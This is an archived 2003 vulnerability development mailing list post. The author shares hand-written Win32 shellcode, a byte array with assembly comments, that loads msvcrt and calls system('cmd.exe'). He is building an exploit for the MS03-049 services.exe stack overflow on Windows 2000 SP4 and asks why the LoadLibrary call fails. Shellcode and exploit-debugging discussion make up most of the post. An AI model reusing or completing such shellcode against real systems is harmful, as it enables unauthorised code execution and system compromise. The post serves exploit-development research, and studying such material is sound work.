Vulnerability Development mailing list archives
Win32 Shellcode question.
From: "Vinay A. Mahadik" <devnull001 () fastmail fm>
Date: Thu, 27 Nov 2003 19:29:18 -0800
I was writing an exploit for the MS03-049 services.exe stack overflow vuln (from scratch for my own academic interest). Here's my shellcode to simply launch a "cmd.exe" shell.
#define LL 0x7C4F05CF #define SYS 0x78018EBF char payload[] = { 0x55, // push ebp 0x8B, 0xEC, // mov ebp,esp 0x33, 0xC0, // xor eax,eax 0x50, // push eax 0x50, // push eax 0xC7, 0x45, 0xF8, 0x6D, 0x73, 0x76, 0x63, // mov dword ptr [ebp-8],6376736Dh 0x66, 0xC7, 0x45, 0xFC, 0x72, 0x74, // mov word ptr [ebp-4],7472h 0x8D, 0x45, 0xF8, // lea eax,[ebp-8] 0x50, // push eax 0xB8, 0xCF, 0x05, 0x4F, 0x7C, // mov eax,LL 0xFF, 0xD0, // call eax <------------ Problem call 0x8B, 0xE5, // mov esp,ebp 0x33, 0xC0, // xor eax,eax 0x50, // push eax 0x50, // push eax 0xC7, 0x45, 0xF8, 0x63, 0x6D, 0x64, 0x2E, // mov dword ptr [ebp-8],2E646D63h 0x66, 0xC7, 0x45, 0xFC, 0x65, 0x78, // mov word ptr [ebp-4],7865h 0xC6, 0x45, 0xFE, 0x65, // mov byte ptr [ebp-2],65h 0x8D, 0x45, 0xF8, // lea eax,[ebp-8] 0x50, // push eax 0xB8, 0xBF, 0x8E, 0x01, 0x78, // mov eax,SYS 0xFF, 0xD0, // call eax ... };"After the overflow, I can step through the NOP sled, and reach the above payload - meaning I have control over the CPU's exec path, and can make it execute my payload. However, I keep getting an "Access Violation" writing location.. error inside the "call eax" that corresponds with LoadLibrary("msvcrt").
I have confirmed the LL and SYS variables for the target (Win2k SP4). Plus, the payload works just fine when compiled and executed outside of services.exe . Is there something special about services.exe that prevents LoadLibraryA from executing normally or what did I do wrong? Can you spot anything I am overlooking? The same payload has worked on other stack-overflow exploits, and inside a simple main(){} loop.
Thanks, Vinay.
Current thread:
- Win32 Shellcode question. Vinay A. Mahadik (Nov 28)
- Re: Win32 Shellcode question. sk (Nov 29)